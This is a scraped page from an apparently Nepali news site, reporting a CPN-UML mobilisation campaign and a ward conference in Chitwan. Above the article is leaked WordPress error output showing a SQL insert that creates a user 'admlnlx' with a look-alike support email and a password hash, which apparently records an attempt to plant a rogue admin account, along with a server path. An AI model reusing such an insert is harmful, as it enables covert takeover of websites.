WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLnwM77lH0fW5vIYPgFhEq4F/HT1gC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:50:33', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
एमाले जनपरिचालन अभियान तिव्र पारिदै – Gaule Khabar

एमाले जनपरिचालन अभियान तिव्र पारिदै

एमाले जनपरिचालन अभियान तिव्र पारिदै

चितवन, माघ १७–

नेकपा एमाले नारायणी नगरकमिटिले एमाले चितवनले चलाउने जनपरिचालन अभियानको कार्ययोजना तयार गरेको छ ।
संविधान कार्यान्वयनमा पार्टीको भूमिका, पार्टीले लिएका नीतिहरु, आगामी स्थानिय निकायको निर्वाचनमा पार्टीलाई कसरी पहिलो बनाउने लगायतका बिषयलाई केन्द्रमा राखेर कार्ययोजना बनाइएको छ ।
नारायणी नगर कमिटिका अध्यक्ष दीलिप न्यौपानको अध्यक्षतामा भएको कार्यक्रमको प्रमुख अतिथि एमाले जिल्ला उपाध्यक्ष तेजेन्द्र खड्का रहेका थिए । कार्यक्रममा एमाले प्रचार विभागका प्रमुख खोमकान्त रेग्मी, सदस्य कृष्ण भुर्तेल, नगर इन्र्चाज दिब्यलक्ष्मी शर्मा लगायतले बोलेका थिए ।
यसैबिच, एमाले रत्ननगर नगरपालिका वडा नः १४ मा पार्टी प्रशिक्षण एवम् अनेमसंघको पहिलो वडा सम्मेलन आईतबार सम्पन्न भएको छ । एमाले जिल्ला इन्चार्ज कृष्ण खनालको प्रमुख आतिथ्यतामा भएको कार्यक्रममा उपसचिव सूर्यबदना हमाल र रामकुमार तिवारीले प्रशिक्षण दिएका थिए । सम्मेलनले हिरा कट्टेलको अध्यक्षतामा २१ सदस्यीय नयाँ कार्य समिति चयन भएको एमाले प्रचार विभागका प्रमुख खोमकान्त रेग्मीले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका